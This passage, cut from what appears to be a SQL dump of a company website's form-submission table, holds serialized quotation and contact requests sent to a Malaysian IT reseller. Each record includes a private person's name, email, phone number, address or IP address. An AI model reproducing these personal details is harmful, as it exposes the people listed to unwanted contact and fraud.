digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"25\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2018-12-20 13:47:53','118.100.231.26','1'),(17,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"Mohamad Kamal Ahmat\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"kamal@nittsu.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0163300360\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"Nippon Express (M) Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:58:\"10th Floor West Tower Wisma Consplant 1, 47500 Subang JAya\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:41:\"Logitech Group, Logitech Rally, SMARTDOCK\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:59:\"Looking for skype for bussiness video conferencing solution\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"88\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2018-12-31 13:51:00','61.6.64.95','1'),(18,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"KAREN LIN\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"karen@intraco.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0162982498\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"SEE HAU GLOBAL SDN BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:121:\"We are looking for 3 units of Jabra Speak 510 or similar bluetooth speakerphone for our conference meeting. Please quote.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"22\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-03 18:29:07','219.92.15.173','1'),(19,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"abdulla sadig\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"info@southgate.mv\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"+9607773545\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Southgate\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:36:\"H.threek Light Male&#039; / Maldives\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:53:\"Logitech Connect, Logitech BCC950, Logitech PTZ Pro 2\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:122:\"we are looking for quotation as selected items each 101 if you can supply please send me your best price and delivery date\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-09 14:59:09','124.195.208.196','1'),(20,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Harris Taib\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"hitcommunications@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"019 2711609\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"HiT Comm\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Shah Alam\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"TOUGHBOOK 31\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"18\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-12 17:40:17','183.171.185.118','1'),(21,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Hendry Lee\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"project1@bodyguard.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0107978818\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:31:\"Body Guard Technologies Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:42:\"Logitech PTZ Pro 2, SmartDock Extender Box\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:67:\"have any accessories or blacket can install the PTZ at wall. Thanks\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"88\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-14 15:03:50','60.49.39.60','1'),(22,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"Rajiv Gerard Lopes\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"rajiv.lopes@hydac.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122950251\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"Hydac Technology Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:56:\"Lot 830, Kawasan Perindustrian Kampung Jaya, Jalan Kusta\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"TOUGHBOOK 33, TOUGHPAD FZ-Q2\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"88\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-15 15:08:18','175.143.50.65','1'),(23,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Rasyid Ngatli\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"rasyid@iyunomg.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0102951075\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"IYUNO Media Group\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:300:\"Hi, I am interested in the Logitech Group Video Conferencing Bundle. Please provide a quotation for the said item. https://www.amazon.com/Logitech-Conferencing-Speakerphone-960-001060-Refurbished/dp/B06Y5J9LC2/ref=sr_1_9?ie=UTF8&amp;qid=1547104795&amp;sr=8-9&amp;keywords=logitech+conferencing+system\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-15 18:00:22','175.143.124.33','1'),(24,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Kent 